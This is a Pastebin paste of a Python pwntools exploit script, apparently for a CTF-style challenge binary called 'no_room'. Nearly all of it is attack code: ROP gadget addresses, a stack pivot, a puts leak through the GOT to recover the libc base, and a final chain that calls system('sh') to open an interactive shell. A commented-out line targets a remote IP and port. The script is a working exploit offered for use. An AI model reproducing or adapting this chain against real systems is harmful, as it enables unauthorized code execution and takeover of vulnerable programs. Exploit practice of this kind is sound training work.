Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- #context.log_level="DEBUG"
- #context.binary="./ropasaurusrex1"
- exec_path = "./no_room"
- context.binary = exec_path
- e = ELF(exec_path)
- log.info("context is: " + str(vars(context)))
- # Determine offsets
- # RBP at 48
- offset=56
- libc = ELF('libc.so.6')
- puts_off = libc.symbols['puts']
- system_off = libc.symbols['system']
- '''
- 0x000000000040076c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x000000000040076e : pop r13 ; pop r14 ; pop r15 ; ret
- 0x0000000000400770 : pop r14 ; pop r15 ; ret
- 0x0000000000400772 : pop r15 ; ret
- 0x000000000040056b : pop rbp ; mov edi, 0x601048 ; jmp rax
- 0x000000000040076b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x000000000040076f : pop rbp ; pop r14 ; pop r15 ; ret
- 0x0000000000400578 : pop rbp ; ret
- 0x0000000000400773 : pop rdi ; ret
- 0x0000000000400771 : pop rsi ; pop r15 ; ret
- 0x000000000040076d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
- 0x0000000000400295 : ret
- '''
- # Legend
- '''
- leave:
- mov ESP, EBP
- pop EBP
- call:
- push next_instruction_offset
- jmp procedure ; procedure is the address of the first instruction to be executed in the procedure
- ret: transfers control to the return address placed on stack. The ret address is usually placed on stack by a call instruction.
- pop EIP_offset
- '''
- # Addresses
- '''
- ret_to_main=0x804841d
- pivot=0x8049700
- gmon_plt=0x080482fc
- '''
- pop_rdi_ret=0x400773
- leave_ret=0x4006d7
- ret_to_text=0x400520
- pivot=0x602080
- ret_to_read=0x004005f7
- rop=""
- #rop+=p64(pop_rdi_ret)+ p64(e.got['puts']) + p64(e.plt['puts']) + p64(ret_to_text)
- rop+="A"*8
- rop+=p64(pop_rdi_ret)
- rop+=p64(e.got['puts'])
- rop+=p64(e.plt['puts'])
- rop+=p64(ret_to_text)
- # Craft payloads
- rop2=""
- rop2+="A"*(offset-8)
- rop2+=p64(pivot)+p64(leave_ret)+p64(pivot)+p64(pivot)
- #pay+=p32(e.plt['puts']) + p32(0x080484b6) + p32(1) + p32(e.got['puts']) + p32(4)
- #pay+=p32(ret_to_main) # echo service
- p=process(exec_path)
- #p=remote('141.85.224.103', '31337')
- #gdb.attach(p)
- gdb.attach(p)
- raw_input("Send payload1?")
- p.sendline(rop)
- #p.recvuntil('Now tell me your name: \n')
- #p.recvlines(4)
- raw_input("Send payload2?")
- p.sendline(rop2)
- #p.recv(5)
- p.recvlines(4)
- puts_libc = u64(p.recv(6)+"\x00"+"\x00")
- log.info("Leaked puts is: {}".format(hex(puts_libc)))
- libc_base = puts_libc - libc.symbols['puts']
- system_addr = libc_base + system_off
- sh_address = libc_base + next(libc.search('sh\x00'))
- log.info("Leaked libc base addr is: {}".format(hex(libc_base)))
- log.info("Leaked system address is: {}".format(hex(system_addr)))
- log.info("Leaked binsh addr is: {}".format(hex(sh_address)))
- '''
- pay+=p32(pivot-4) + p32(e.plt['read']) +p32(0x80483f1)+ p32(0) + p32(pivot) + p32(56)
- pay2="JUNK"+p32(e.plt['write']) + p32(0x080484b6) + p32(1) + p32(e.got['write']) + p32(4)
- pay2+=p32(e.plt['read']) + p32(0x080484b6) + p32(0) + p32(e.got['__gmon_start__']) + p32(4)
- pay2+=p32(gmon_plt) + "AAAA" + p32(0x804867f)
- '''
- rop3=""
- rop3+=cyclic(56)
- rop3+=p64(pop_rdi_ret)
- rop3+=p64(sh_address)
- rop3+=p64(system_addr)
- junk="AAAA"
- #p.recvlines(2)
- raw_input("Send pay3?")
- p.sendline(junk)
- raw_input('Send pay4?')
- p.sendline(rop3)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
